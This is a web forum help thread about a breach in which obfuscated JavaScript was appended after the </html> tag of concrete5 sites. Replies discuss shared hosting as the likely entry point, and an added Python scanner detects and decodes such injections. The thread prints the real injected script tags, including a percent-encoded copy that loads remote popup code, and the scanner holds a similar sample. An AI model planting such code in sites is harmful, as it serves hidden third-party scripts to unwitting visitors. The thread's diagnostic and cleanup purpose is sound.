Injection of Javascript after closing HTML tag
Hi all!
I have experienced a breach of multiple C5 sites that I manage. The following code has been injected after the </html> on multiple sites on different installations of C5.
The code is:
<script type="text/javascript" src="http://yllix.com/popup.php?pub=224111&section=General&ga=g&show=20"></script> <script language="javascript"> document.write( unescape( '%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%79%6C%6C%69%78%2E%63%6F%6D%2F%70%6F%70%75%70%2E%70%68%70%3F%70%75%62%3D%32%32%34%31%31%31%26%73%65%63%74%69%6F%6E%3D%47%65%6E%65%72%61%6C%26%67%61%3D%67%26%73%68%6F%77%3D%32%30%22%3E%3C%2F%73%63%72%69%70%74%3E' ) ); </script>
Does anyone else have experience of this, or any idea how this breach could have happened on my sites?
Thanks
Simon.
The only time I've seen a concrete5 site affected by a hack such as this is when another application is sharing the same hosting account and that application is used as an attack vector - via such an exploit the scripts tend to just broadly scan and target common file names like index.php, index.html, home.php, etc., and append extra code at the bottom (sometimes with lots of whitespace about it to try to hide it). They sometimes target .htaccess files as well. They add changes that would work on any PHP script, not just concrete5.
If you host a whole bunch of sites under one hosting account ('add-on domains' in cPanel), if there is an exploit in any of them, all sites may be affected in this way.
So it's worth having a look if you've got other sites on the same hosting space, like blogs, wikis, old versions of Joomla - stuff that ISN'T concrete5.
I've personally never seen a concrete5 website just sitting by itself modified/hacked (and I hope that it stays that way!).
It's not usually a good idea to post links that hackers injected into your scripts without removing the php file from the link. Curious folks visiting this thread might visit the link you posted and trouble might ensue.
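For anyone cleaning up after the kind of injection described in this thread, here is an added example (not code from any poster or from concrete5) that walks a web root, reports files with content after the closing </html> tag, and decodes unescape() payloads so the hidden script source is visible. The function names, the extension list and the sample page are assumptions made for illustration.

```python
import os
import re
from urllib.parse import unquote

CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc=[\"']([^\"']+)", re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm")  # assumed set of files worth checking


def inspect_tail(text):
    """Return findings for content that follows the last </html>, else None."""
    matches = list(CLOSE_HTML.finditer(text))
    tail = text[matches[-1].end():] if matches else ""
    if not tail.strip():
        return None  # nothing, or only whitespace, after the closing tag
    # Percent-decode unescape('...') arguments to expose hidden script tags.
    decoded = [unquote(m.group(2)) for m in UNESCAPE.finditer(tail)]
    sources = SCRIPT_SRC.findall(tail)
    for chunk in decoded:
        sources += SCRIPT_SRC.findall(chunk)
    return {
        "tail_chars": len(tail.strip()),
        "padding": len(tail) - len(tail.lstrip()),  # whitespace used to hide it
        "script_sources": sorted(set(sources)),
    }


def scan(root):
    """Walk root and map each suspicious file path to its findings."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                finding = inspect_tail(fh.read())
            if finding:
                hits[path] = finding
    return hits


# Constructed sample: a page with a padded, percent-encoded script appended.
SAMPLE = ("<html><body>ok</body></html>" + "\n" * 40 +
          "<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F"
          "ads.example.invalid%2Fp.php%22%3E%3C%2Fscript%3E'));</script>")

if __name__ == "__main__":
    print(inspect_tail(SAMPLE))
```

Run scan() against every add-on domain directory under the hosting account, not only the concrete5 ones, and compare any hits with a clean copy of the same file.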